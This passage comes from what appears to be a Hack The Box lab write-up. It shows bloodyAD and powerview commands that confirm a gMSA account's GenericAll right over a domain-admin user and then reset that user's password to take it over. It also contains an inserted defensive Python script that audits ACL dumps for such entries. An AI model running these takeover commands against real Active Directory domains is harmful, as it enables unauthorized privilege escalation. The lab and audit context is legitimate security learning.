GenericAll


As discovered during the BloodHound session, the [[search_lateral_movement_bir-adfs-gmsa#bir-adfs-gmsa|compromised]] `bir-adfs-gmsa` account has the [GenericAll](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericall) privilege over the `tristan.davies` user.

While there are a lot of ways to compromise the target user from this point, as the GenericAll privilege grants complete control over the user object, I will first confirm it.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache bloodyAD -d SEARCH.HTB -k --host research.search.htb --secure get object 'CN=Tristan Davies,CN=Users,DC=search,DC=htb' --resolve-sd | grep -i nTSecurityDescriptor.ACL.8      
ntsecuritydescriptor.acl.8.type: == ALLOWED ==
ntsecuritydescriptor.acl.8.trustee: BIR-ADFS-GMSA$; LOCAL_SYSTEM
ntsecuritydescriptor.acl.8.right: GENERIC_ALL
ntsecuritydescriptor.acl.8.objecttype: Self

The 8th ACL entry indeed shows the GenericAll privilege that the `BIR-ADFS-GMSA$` account has over the `tristan.davies` user.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache powerview 'SEARCH.HTB/@research.search.htb' --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity tristan.davies -ResolveGUIDs'                  
[2024-01-31 10:55:51] LDAP Signing NOT Enforced!
 
[...REDACTED...]
 
objectdn                    : CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectsid                   : S-1-5-21-271492789-1610487937-1871574529-1298
acetype                     : ACCESS_ALLOWED_ACE
aceflags                    : None
activedirectoryrights       : FullControl
access mask                 : 0xf01ff
inheritancetype             : None
securityidentifier          : BIR-ADFS-GMSA$ (S-1-5-21-271492789-1610487937-1871574529-1299)
 
[...REDACTED...]

The same result can be seen using powerview.
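From the defender's side, the two listings above are exactly what an ACL audit should be catching before an attacker does: a non-administrative principal holding GENERIC_ALL (access mask `0xf01ff`, shown as `FullControl` by powerview) over a privileged user. The script below is an added example, not part of this write-up or of bloodyAD/powerview: it parses bloodyAD's `--resolve-sd` line format (`ntsecuritydescriptor.acl.<n>.<field>: <value>`), decodes the AD access-mask bits, and flags allowed GENERIC_ALL entries whose trustee is not on an approved list. The sample output and the approved-trustee list are constructed for the example; the `acl.8` lines mirror the output shown above, `acl.0` is a made-up benign entry.

```python
"""Added example: audit bloodyAD --resolve-sd ACL output for risky GENERIC_ALL ACEs."""
import re
from collections import defaultdict

# AD object access-mask bits (ADS_RIGHT_ENUM). Their union, 0xF01FF, is the
# value powerview reports as "FullControl" and BloodHound draws as GenericAll.
ADS_RIGHTS = {
    "CREATE_CHILD": 0x00000001,
    "DELETE_CHILD": 0x00000002,
    "LIST_CHILDREN": 0x00000004,
    "SELF": 0x00000008,
    "READ_PROP": 0x00000010,
    "WRITE_PROP": 0x00000020,
    "DELETE_TREE": 0x00000040,
    "LIST_OBJECT": 0x00000080,
    "CONTROL_ACCESS": 0x00000100,
    "DELETE": 0x00010000,
    "READ_CONTROL": 0x00020000,
    "WRITE_DAC": 0x00040000,
    "WRITE_OWNER": 0x00080000,
}
FULL_CONTROL_MASK = 0xF01FF

# Constructed sample: acl.8 mirrors the bloodyAD output in the write-up,
# acl.0 is a made-up entry for a group that legitimately holds full control.
SAMPLE_OUTPUT = """\
ntsecuritydescriptor.acl.0.type: == ALLOWED ==
ntsecuritydescriptor.acl.0.trustee: Domain Admins
ntsecuritydescriptor.acl.0.right: GENERIC_ALL
ntsecuritydescriptor.acl.0.objecttype: Self
ntsecuritydescriptor.acl.8.type: == ALLOWED ==
ntsecuritydescriptor.acl.8.trustee: BIR-ADFS-GMSA$; LOCAL_SYSTEM
ntsecuritydescriptor.acl.8.right: GENERIC_ALL
ntsecuritydescriptor.acl.8.objecttype: Self
"""

# Constructed allow-list (assumption): principals expected to hold full control.
APPROVED_TRUSTEES = {"DOMAIN ADMINS", "ENTERPRISE ADMINS", "LOCAL_SYSTEM"}

ACE_LINE = re.compile(r"^ntsecuritydescriptor\.acl\.(\d+)\.(\w+):\s*(.*)$", re.I)


def parse_bloodyad_acl(text):
    """Group `ntsecuritydescriptor.acl.<n>.<field>: <value>` lines into one dict per ACE."""
    aces = defaultdict(dict)
    for line in text.splitlines():
        m = ACE_LINE.match(line.strip())
        if m:
            idx, field, value = m.groups()
            aces[int(idx)][field.lower()] = value.strip()
    return [dict(index=i, **aces[i]) for i in sorted(aces)]


def decode_mask(mask):
    """Return the names of the ADS_RIGHTS bits set in an access mask."""
    return sorted(name for name, bit in ADS_RIGHTS.items() if mask & bit)


def is_full_control(mask):
    """True when every bit of the AD FullControl mask (0xF01FF) is set."""
    return mask & FULL_CONTROL_MASK == FULL_CONTROL_MASK


def find_risky_aces(aces, approved_trustees):
    """Allowed GENERIC_ALL ACEs where at least one trustee name is not approved."""
    risky = []
    for ace in aces:
        if ace.get("type", "").strip("= ").upper() != "ALLOWED":
            continue
        if ace.get("right", "").upper() != "GENERIC_ALL":
            continue
        # bloodyAD prints several names for one trustee separated by ';'
        names = {n.strip().upper() for n in ace.get("trustee", "").split(";") if n.strip()}
        unapproved = names - approved_trustees
        if unapproved:
            risky.append(dict(ace, unapproved=sorted(unapproved)))
    return risky


if __name__ == "__main__":
    for ace in find_risky_aces(parse_bloodyad_acl(SAMPLE_OUTPUT), APPROVED_TRUSTEES):
        print(f"[!] acl.{ace['index']}: GENERIC_ALL for {ace['unapproved']} "
              f"(objecttype={ace.get('objecttype')})")
    print("FullControl mask 0xF01FF decodes to:", ", ".join(decode_mask(0xF01FF)))
```

Run against a real `bloodyAD ... get object <DN> --resolve-sd` dump of each Domain Admin account (and of AdminSDHolder), the allow-list is the only thing to adapt; any hit is an ACL that lets a non-admin principal reset the password or otherwise take over a privileged user, which is what the rest of this write-up demonstrates.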

Password Reset


┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=BIR-ADFS-GMSA\$@research.search.htb.ccache bloodyAD -d SEARCH.HTB -k --host research.search.htb --secure set password 'CN=TRISTAN DAVIES,CN=USERS,DC=SEARCH,DC=HTB' 'Qwer!234'
[+] Password changed successfully!

Since full control is granted over the target user object with the GenericAll privilege, I could just change the password of the target user. Resetting the password of the `tristan.davies` user to `Qwer!234`. Validation will be made by requesting a TGT.

Additionally, the `tristan.davies` user is a DA. Moving on to the Privilege Escalation phase.